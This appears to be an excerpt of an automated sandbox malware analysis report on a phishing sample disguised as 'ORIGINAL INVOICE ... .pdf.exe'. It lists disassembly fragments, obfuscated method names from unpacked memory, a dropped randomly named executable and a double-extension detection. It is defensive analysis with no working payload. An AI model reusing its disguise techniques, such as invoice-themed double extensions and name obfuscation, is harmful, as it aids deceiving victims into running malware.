            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_00408307 push ds; iretd 3_2_00408309
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_00403330 push eax; ret 3_2_00403332
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_00415C40 push ebx; ret 3_2_00415C6A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_00415C43 push ebx; ret 3_2_00415C6A
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_00404D23 push esi; retf 3_2_00404D24
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_00413E4A push edi; retf 3_2_00413E4B
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_00413F1C push eax; ret 3_2_00413F26
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_00417FD0 push esp; ret 3_2_00417FD1
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_004187E8 push ebx; ret 3_2_004187E9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_019E225F pushad ; ret 3_2_019E27F9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_019E27FA pushad ; ret 3_2_019E27F9
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_01A109AD push ecx; mov dword ptr [esp], ecx3_2_01A109B6
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_019E283D push eax; iretd 3_2_019E2858
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeCode function: 3_2_019E1368 push eax; iretd 3_2_019E1369
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_036FEB7E push ebx; ret 7_2_036FEBA5
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_036FEB7B push ebx; ret 7_2_036FEBA5
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_036F1242 push ds; iretd 7_2_036F1244
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_036F6005 push edi; ret 7_2_036F6007
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_036FF0A1 pushfd ; iretd 7_2_036FF120
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_037008BF push esp; iretd 7_2_037008C5
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_03701723 push ebx; ret 7_2_03701724
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_03700F0B push esp; ret 7_2_03700F0C
            Source: C:\Program Files (x86)\eWtDAGowqdSGFXEYThrsFkCQDEZMRkYQPWNKxqwoIJHoNBCwAJaL\fFUkGixTNm.exeCode function: 7_2_03701C14 push cs; retf 7_2_03701C15
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_039E225F pushad ; ret 8_2_039E27F9
            Source: C:\Windows\SysWOW64\RpcPing.exeCode function: 8_2_039E27FA pushad ; ret 8_2_039E27F9
            Source: ORIGINAL INVOICE COAU7230734298.pdf.exeStatic PE information: section name: .text entropy: 7.754463700440127
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, VJYMC1jXYO50ycofa1x.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mWGkFufV9U', 'ApFkVrOJRd', 'db9kIA8C0y', 'MfskyfFbUh', 'SwNkMWF7Hm', 'W9mkSjc1P3', 'w8fk69wyFB'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, EAgkxljcSmXysaymPIk.csHigh entropy of concatenated method names: 'RoP1fAGoKF', 'v1Z1Jj8y5P', 'naX17cYyaC', 'gFN1m8tX4n', 'yV810gqwt1', 'uQl1bVYa5b', 'Yu41LCWHqT', 'l8v1e51Yig', 'QVR1hE6xBl', 'Prp1OKcjXc'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, aCwl6tvb2r4l4lgPk8.csHigh entropy of concatenated method names: 'qYc75uL0J', 'TEqmUh9JD', 'c5dbOQ7ig', 'U9iLEsk4w', 'hgQhE9arO', 'iJNOkodQA', 'ON9mMpa2SRwpjNA4RP', 's5oqLfELxjtjsN3BfX', 'mx6ZkEZ02', 'aILkOXd9S'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, ARbWimPM9BLNHCRJ2O.csHigh entropy of concatenated method names: 'e1O1jvdwZr', 'SXf1XQOB8p', 'jhe15adhQB', 'kEV1CUuZ21', 'jJ91dvBUX0', 'olx12W4w9G', 'f021HZ7X4x', 'F5oZ6eTVN7', 'X2YZDoBptq', 'EM5ZaRY0e2'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, GoUr3lTHbTH93s671o.csHigh entropy of concatenated method names: 'z7yXB89VK8', 'IiWXCoDZKI', 'qZoXd0h6ey', 'nZtXuCuZoa', 'R1nX2iXMaT', 'hEkXHvUAUj', 'IIAXUyEo5F', 'kwgXT3sjcd', 'uNUXqo1SeY', 'BdUXEUl1Ex'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, nTJjqGDEwt6UWiOkfg.csHigh entropy of concatenated method names: 'j2jZCrM7t3', 'oCDZdlkDXE', 'xIoZuThGYC', 'XbpZ2m7DtY', 'JWXZHgcd5P', 'dOaZUUL8u6', 'GBGZTEy2O1', 'e4vZqlWchb', 'xYOZE1jTMo', 'FqfZY2WSBk'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, J1Np7SeHlsncQgvjqU.csHigh entropy of concatenated method names: 'BGodFXXeEs', 'meedVWaBO3', 'fdodIcvsJA', 'cZsdyma6VS', 'E5odM0O7tF', 'iBEdSs3Oyo', 'l5Cd6vJ0Um', 'BKcdDUyKTh', 'pVfdaGIfhu', 'UODdPwGKxy'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, OjZ7RBSXW86l78uSxp.csHigh entropy of concatenated method names: 'eTwWDh6bDh', 'kSuWPIuSIi', 'hAOZc6rv10', 'wAJZje16d5', 'HQtWo2MMOJ', 'xIiWpVyrDd', 'iumWiHakR3', 'z4NWFWuoKE', 'pf7WV0rBaY', 'l9uWI3daYE'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, Wpam4hihg0Nvl3e5yB.csHigh entropy of concatenated method names: 'rDw4eNbg84', 'Hy64hcY5T5', 'Jl94RYA28h', 'YUX4ABgB56', 'Bsr4sYtwxy', 'Fdx4tMaSeO', 'My54GTy3KO', 'AK04lvZJSZ', 'nxH4g3wdoB', 'BS04oSgrlk'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, Ai53E95PRabl3WDJEP.csHigh entropy of concatenated method names: 'vWtjU1Np7S', 'ilsjTncQgv', 'h3TjE9yKYE', 'VMIjYEf7nX', 'l7ejxWZsCV', 'PIsjnZpK8D', 'ivRpbcbuWyOrt4TytB', 'KmPeqcOB4uJpsli6uS', 'sVyjjwK0Jt', 'UHojXdb3Sc'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, T2PoPgILNR5h8eN7LX.csHigh entropy of concatenated method names: 'ToString', 'OoknoUEQMu', 'MZHnAE9lj1', 'C5in8cMduG', 'LbEns56hT0', 'JdAntnKQ4S', 'LU2n9nuy6m', 'rsHnGr7iaW', 'WZ0nlwB6sf', 'hbQnwYCGO3'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, zy1dsfGrxZ2s5C8xWF.csHigh entropy of concatenated method names: 'gxOUCAI7sZ', 'DyRUuhdGwo', 'befUHcC4PC', 'AD3HP4kOLk', 'mwZHz4gR0v', 'YtNUcgkR5F', 'ufTUjcCBoJ', 'hr0Uvt0Qwf', 'GORUXjfQ2d', 'FBBU5xb4GX'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, ICVpIsRZpK8Dw3FWN4.csHigh entropy of concatenated method names: 'WPUHBSTr2l', 'jppHdW89r1', 'HsYH2iVEfM', 't2hHUQOGoK', 'yHnHTmbteU', 'TGK2MrTkaH', 'jRa2SFsWXd', 'LpP26eL8rg', 'giq2DnYRgL', 'B7x2aT0OKQ'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, ABEQf2h3T9yKYESMIE.csHigh entropy of concatenated method names: 'ADJumFnKbC', 's18ub2UmJU', 'E6MuePaFfc', 'PcPuh7Ng8n', 'LuauxcA9cg', 'tH5unYdUG7', 'caUuWums2f', 'uv2uZypJUX', 'tpxu1YvAF4', 'FTaukqX5GN'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, gKOXD3z7pcJxVh7SOu.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'i2114BvDPO', 'cec1xs2Swy', 'wT11nbxefg', 'kI11We0uwH', 'OIg1Zvpw46', 'HPg11MwkW1', 'BB71kRKXPx'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, SWaEDGw2CVMfXXDHb5.csHigh entropy of concatenated method names: 'MbeUfvpZGR', 'RwiUJGWKSf', 'TiqU7bUbuW', 'OVhUma24DZ', 'uEsU09qlDZ', 'n5AUbQ59Rb', 'doeUL9Q4YA', 'l3PUeeq29b', 'NatUh2e7cf', 'fn0UO1JbKs'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, j81Na2FAQgp64f4UWH.csHigh entropy of concatenated method names: 'aWDxgQSBoT', 'YEYxpx3UtA', 'qsQxFkJW1A', 'TqtxVO36NV', 'JxSxAootTM', 'lZYx8I0EG7', 'zkVxsHnNGt', 'nRjxtZ4jxn', 'ua5x9grgMq', 'yAnxGwM1nb'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, jFxTeRd4Bb2okMqd4B.csHigh entropy of concatenated method names: 'Dispose', 'yYajaKLhYo', 'Ra2vAlwcKU', 'WtZHHveEDv', 'fYTjPJjqGE', 'Mt6jzUWiOk', 'ProcessDialogKey', 'xgQvcrLVXp', 'q5Evjj5S2a', 'ujHvv0RbWi'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.41558b0.3.raw.unpack, x7nXI7OSkcCo7q7eWZ.csHigh entropy of concatenated method names: 'ikL206PfVt', 'UQl2LsR7mt', 'Q3cu8rdnoH', 'dPnus7DV72', 'wZfutTTMik', 'Pg4u9ZqhLO', 'dZXuG0KeMK', 'TWSulb0d4m', 'wyWuwSMM0J', 'mr7ugsxl7Y'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, VJYMC1jXYO50ycofa1x.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mWGkFufV9U', 'ApFkVrOJRd', 'db9kIA8C0y', 'MfskyfFbUh', 'SwNkMWF7Hm', 'W9mkSjc1P3', 'w8fk69wyFB'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, EAgkxljcSmXysaymPIk.csHigh entropy of concatenated method names: 'RoP1fAGoKF', 'v1Z1Jj8y5P', 'naX17cYyaC', 'gFN1m8tX4n', 'yV810gqwt1', 'uQl1bVYa5b', 'Yu41LCWHqT', 'l8v1e51Yig', 'QVR1hE6xBl', 'Prp1OKcjXc'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, aCwl6tvb2r4l4lgPk8.csHigh entropy of concatenated method names: 'qYc75uL0J', 'TEqmUh9JD', 'c5dbOQ7ig', 'U9iLEsk4w', 'hgQhE9arO', 'iJNOkodQA', 'ON9mMpa2SRwpjNA4RP', 's5oqLfELxjtjsN3BfX', 'mx6ZkEZ02', 'aILkOXd9S'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, ARbWimPM9BLNHCRJ2O.csHigh entropy of concatenated method names: 'e1O1jvdwZr', 'SXf1XQOB8p', 'jhe15adhQB', 'kEV1CUuZ21', 'jJ91dvBUX0', 'olx12W4w9G', 'f021HZ7X4x', 'F5oZ6eTVN7', 'X2YZDoBptq', 'EM5ZaRY0e2'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, GoUr3lTHbTH93s671o.csHigh entropy of concatenated method names: 'z7yXB89VK8', 'IiWXCoDZKI', 'qZoXd0h6ey', 'nZtXuCuZoa', 'R1nX2iXMaT', 'hEkXHvUAUj', 'IIAXUyEo5F', 'kwgXT3sjcd', 'uNUXqo1SeY', 'BdUXEUl1Ex'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, nTJjqGDEwt6UWiOkfg.csHigh entropy of concatenated method names: 'j2jZCrM7t3', 'oCDZdlkDXE', 'xIoZuThGYC', 'XbpZ2m7DtY', 'JWXZHgcd5P', 'dOaZUUL8u6', 'GBGZTEy2O1', 'e4vZqlWchb', 'xYOZE1jTMo', 'FqfZY2WSBk'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, J1Np7SeHlsncQgvjqU.csHigh entropy of concatenated method names: 'BGodFXXeEs', 'meedVWaBO3', 'fdodIcvsJA', 'cZsdyma6VS', 'E5odM0O7tF', 'iBEdSs3Oyo', 'l5Cd6vJ0Um', 'BKcdDUyKTh', 'pVfdaGIfhu', 'UODdPwGKxy'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, OjZ7RBSXW86l78uSxp.csHigh entropy of concatenated method names: 'eTwWDh6bDh', 'kSuWPIuSIi', 'hAOZc6rv10', 'wAJZje16d5', 'HQtWo2MMOJ', 'xIiWpVyrDd', 'iumWiHakR3', 'z4NWFWuoKE', 'pf7WV0rBaY', 'l9uWI3daYE'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, Wpam4hihg0Nvl3e5yB.csHigh entropy of concatenated method names: 'rDw4eNbg84', 'Hy64hcY5T5', 'Jl94RYA28h', 'YUX4ABgB56', 'Bsr4sYtwxy', 'Fdx4tMaSeO', 'My54GTy3KO', 'AK04lvZJSZ', 'nxH4g3wdoB', 'BS04oSgrlk'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, Ai53E95PRabl3WDJEP.csHigh entropy of concatenated method names: 'vWtjU1Np7S', 'ilsjTncQgv', 'h3TjE9yKYE', 'VMIjYEf7nX', 'l7ejxWZsCV', 'PIsjnZpK8D', 'ivRpbcbuWyOrt4TytB', 'KmPeqcOB4uJpsli6uS', 'sVyjjwK0Jt', 'UHojXdb3Sc'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, T2PoPgILNR5h8eN7LX.csHigh entropy of concatenated method names: 'ToString', 'OoknoUEQMu', 'MZHnAE9lj1', 'C5in8cMduG', 'LbEns56hT0', 'JdAntnKQ4S', 'LU2n9nuy6m', 'rsHnGr7iaW', 'WZ0nlwB6sf', 'hbQnwYCGO3'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, zy1dsfGrxZ2s5C8xWF.csHigh entropy of concatenated method names: 'gxOUCAI7sZ', 'DyRUuhdGwo', 'befUHcC4PC', 'AD3HP4kOLk', 'mwZHz4gR0v', 'YtNUcgkR5F', 'ufTUjcCBoJ', 'hr0Uvt0Qwf', 'GORUXjfQ2d', 'FBBU5xb4GX'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, ICVpIsRZpK8Dw3FWN4.csHigh entropy of concatenated method names: 'WPUHBSTr2l', 'jppHdW89r1', 'HsYH2iVEfM', 't2hHUQOGoK', 'yHnHTmbteU', 'TGK2MrTkaH', 'jRa2SFsWXd', 'LpP26eL8rg', 'giq2DnYRgL', 'B7x2aT0OKQ'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, ABEQf2h3T9yKYESMIE.csHigh entropy of concatenated method names: 'ADJumFnKbC', 's18ub2UmJU', 'E6MuePaFfc', 'PcPuh7Ng8n', 'LuauxcA9cg', 'tH5unYdUG7', 'caUuWums2f', 'uv2uZypJUX', 'tpxu1YvAF4', 'FTaukqX5GN'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, gKOXD3z7pcJxVh7SOu.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'i2114BvDPO', 'cec1xs2Swy', 'wT11nbxefg', 'kI11We0uwH', 'OIg1Zvpw46', 'HPg11MwkW1', 'BB71kRKXPx'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, SWaEDGw2CVMfXXDHb5.csHigh entropy of concatenated method names: 'MbeUfvpZGR', 'RwiUJGWKSf', 'TiqU7bUbuW', 'OVhUma24DZ', 'uEsU09qlDZ', 'n5AUbQ59Rb', 'doeUL9Q4YA', 'l3PUeeq29b', 'NatUh2e7cf', 'fn0UO1JbKs'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, j81Na2FAQgp64f4UWH.csHigh entropy of concatenated method names: 'aWDxgQSBoT', 'YEYxpx3UtA', 'qsQxFkJW1A', 'TqtxVO36NV', 'JxSxAootTM', 'lZYx8I0EG7', 'zkVxsHnNGt', 'nRjxtZ4jxn', 'ua5x9grgMq', 'yAnxGwM1nb'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, jFxTeRd4Bb2okMqd4B.csHigh entropy of concatenated method names: 'Dispose', 'yYajaKLhYo', 'Ra2vAlwcKU', 'WtZHHveEDv', 'fYTjPJjqGE', 'Mt6jzUWiOk', 'ProcessDialogKey', 'xgQvcrLVXp', 'q5Evjj5S2a', 'ujHvv0RbWi'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.7420000.5.raw.unpack, x7nXI7OSkcCo7q7eWZ.csHigh entropy of concatenated method names: 'ikL206PfVt', 'UQl2LsR7mt', 'Q3cu8rdnoH', 'dPnus7DV72', 'wZfutTTMik', 'Pg4u9ZqhLO', 'dZXuG0KeMK', 'TWSulb0d4m', 'wyWuwSMM0J', 'mr7ugsxl7Y'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, VJYMC1jXYO50ycofa1x.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mWGkFufV9U', 'ApFkVrOJRd', 'db9kIA8C0y', 'MfskyfFbUh', 'SwNkMWF7Hm', 'W9mkSjc1P3', 'w8fk69wyFB'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, EAgkxljcSmXysaymPIk.csHigh entropy of concatenated method names: 'RoP1fAGoKF', 'v1Z1Jj8y5P', 'naX17cYyaC', 'gFN1m8tX4n', 'yV810gqwt1', 'uQl1bVYa5b', 'Yu41LCWHqT', 'l8v1e51Yig', 'QVR1hE6xBl', 'Prp1OKcjXc'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, aCwl6tvb2r4l4lgPk8.csHigh entropy of concatenated method names: 'qYc75uL0J', 'TEqmUh9JD', 'c5dbOQ7ig', 'U9iLEsk4w', 'hgQhE9arO', 'iJNOkodQA', 'ON9mMpa2SRwpjNA4RP', 's5oqLfELxjtjsN3BfX', 'mx6ZkEZ02', 'aILkOXd9S'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, ARbWimPM9BLNHCRJ2O.csHigh entropy of concatenated method names: 'e1O1jvdwZr', 'SXf1XQOB8p', 'jhe15adhQB', 'kEV1CUuZ21', 'jJ91dvBUX0', 'olx12W4w9G', 'f021HZ7X4x', 'F5oZ6eTVN7', 'X2YZDoBptq', 'EM5ZaRY0e2'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, GoUr3lTHbTH93s671o.csHigh entropy of concatenated method names: 'z7yXB89VK8', 'IiWXCoDZKI', 'qZoXd0h6ey', 'nZtXuCuZoa', 'R1nX2iXMaT', 'hEkXHvUAUj', 'IIAXUyEo5F', 'kwgXT3sjcd', 'uNUXqo1SeY', 'BdUXEUl1Ex'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, nTJjqGDEwt6UWiOkfg.csHigh entropy of concatenated method names: 'j2jZCrM7t3', 'oCDZdlkDXE', 'xIoZuThGYC', 'XbpZ2m7DtY', 'JWXZHgcd5P', 'dOaZUUL8u6', 'GBGZTEy2O1', 'e4vZqlWchb', 'xYOZE1jTMo', 'FqfZY2WSBk'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, J1Np7SeHlsncQgvjqU.csHigh entropy of concatenated method names: 'BGodFXXeEs', 'meedVWaBO3', 'fdodIcvsJA', 'cZsdyma6VS', 'E5odM0O7tF', 'iBEdSs3Oyo', 'l5Cd6vJ0Um', 'BKcdDUyKTh', 'pVfdaGIfhu', 'UODdPwGKxy'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, OjZ7RBSXW86l78uSxp.csHigh entropy of concatenated method names: 'eTwWDh6bDh', 'kSuWPIuSIi', 'hAOZc6rv10', 'wAJZje16d5', 'HQtWo2MMOJ', 'xIiWpVyrDd', 'iumWiHakR3', 'z4NWFWuoKE', 'pf7WV0rBaY', 'l9uWI3daYE'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, Wpam4hihg0Nvl3e5yB.csHigh entropy of concatenated method names: 'rDw4eNbg84', 'Hy64hcY5T5', 'Jl94RYA28h', 'YUX4ABgB56', 'Bsr4sYtwxy', 'Fdx4tMaSeO', 'My54GTy3KO', 'AK04lvZJSZ', 'nxH4g3wdoB', 'BS04oSgrlk'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, Ai53E95PRabl3WDJEP.csHigh entropy of concatenated method names: 'vWtjU1Np7S', 'ilsjTncQgv', 'h3TjE9yKYE', 'VMIjYEf7nX', 'l7ejxWZsCV', 'PIsjnZpK8D', 'ivRpbcbuWyOrt4TytB', 'KmPeqcOB4uJpsli6uS', 'sVyjjwK0Jt', 'UHojXdb3Sc'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, T2PoPgILNR5h8eN7LX.csHigh entropy of concatenated method names: 'ToString', 'OoknoUEQMu', 'MZHnAE9lj1', 'C5in8cMduG', 'LbEns56hT0', 'JdAntnKQ4S', 'LU2n9nuy6m', 'rsHnGr7iaW', 'WZ0nlwB6sf', 'hbQnwYCGO3'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, zy1dsfGrxZ2s5C8xWF.csHigh entropy of concatenated method names: 'gxOUCAI7sZ', 'DyRUuhdGwo', 'befUHcC4PC', 'AD3HP4kOLk', 'mwZHz4gR0v', 'YtNUcgkR5F', 'ufTUjcCBoJ', 'hr0Uvt0Qwf', 'GORUXjfQ2d', 'FBBU5xb4GX'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, ICVpIsRZpK8Dw3FWN4.csHigh entropy of concatenated method names: 'WPUHBSTr2l', 'jppHdW89r1', 'HsYH2iVEfM', 't2hHUQOGoK', 'yHnHTmbteU', 'TGK2MrTkaH', 'jRa2SFsWXd', 'LpP26eL8rg', 'giq2DnYRgL', 'B7x2aT0OKQ'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, ABEQf2h3T9yKYESMIE.csHigh entropy of concatenated method names: 'ADJumFnKbC', 's18ub2UmJU', 'E6MuePaFfc', 'PcPuh7Ng8n', 'LuauxcA9cg', 'tH5unYdUG7', 'caUuWums2f', 'uv2uZypJUX', 'tpxu1YvAF4', 'FTaukqX5GN'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, gKOXD3z7pcJxVh7SOu.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'i2114BvDPO', 'cec1xs2Swy', 'wT11nbxefg', 'kI11We0uwH', 'OIg1Zvpw46', 'HPg11MwkW1', 'BB71kRKXPx'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, SWaEDGw2CVMfXXDHb5.csHigh entropy of concatenated method names: 'MbeUfvpZGR', 'RwiUJGWKSf', 'TiqU7bUbuW', 'OVhUma24DZ', 'uEsU09qlDZ', 'n5AUbQ59Rb', 'doeUL9Q4YA', 'l3PUeeq29b', 'NatUh2e7cf', 'fn0UO1JbKs'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, j81Na2FAQgp64f4UWH.csHigh entropy of concatenated method names: 'aWDxgQSBoT', 'YEYxpx3UtA', 'qsQxFkJW1A', 'TqtxVO36NV', 'JxSxAootTM', 'lZYx8I0EG7', 'zkVxsHnNGt', 'nRjxtZ4jxn', 'ua5x9grgMq', 'yAnxGwM1nb'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, jFxTeRd4Bb2okMqd4B.csHigh entropy of concatenated method names: 'Dispose', 'yYajaKLhYo', 'Ra2vAlwcKU', 'WtZHHveEDv', 'fYTjPJjqGE', 'Mt6jzUWiOk', 'ProcessDialogKey', 'xgQvcrLVXp', 'q5Evjj5S2a', 'ujHvv0RbWi'
            Source: 0.2.ORIGINAL INVOICE COAU7230734298.pdf.exe.40ce090.0.raw.unpack, x7nXI7OSkcCo7q7eWZ.csHigh entropy of concatenated method names: 'ikL206PfVt', 'UQl2LsR7mt', 'Q3cu8rdnoH', 'dPnus7DV72', 'wZfutTTMik', 'Pg4u9ZqhLO', 'dZXuG0KeMK', 'TWSulb0d4m', 'wyWuwSMM0J', 'mr7ugsxl7Y'

            Hooking and other Techniques for Hiding and Protection

            barindex
            Uses an obfuscated file name to hide its real file extension (double extension)
            Source: Possible double extension: pdf.exeStatic PE information: ORIGINAL INVOICE COAU7230734298.pdf.exe
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\ORIGINAL INVOICE COAU7230734298.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
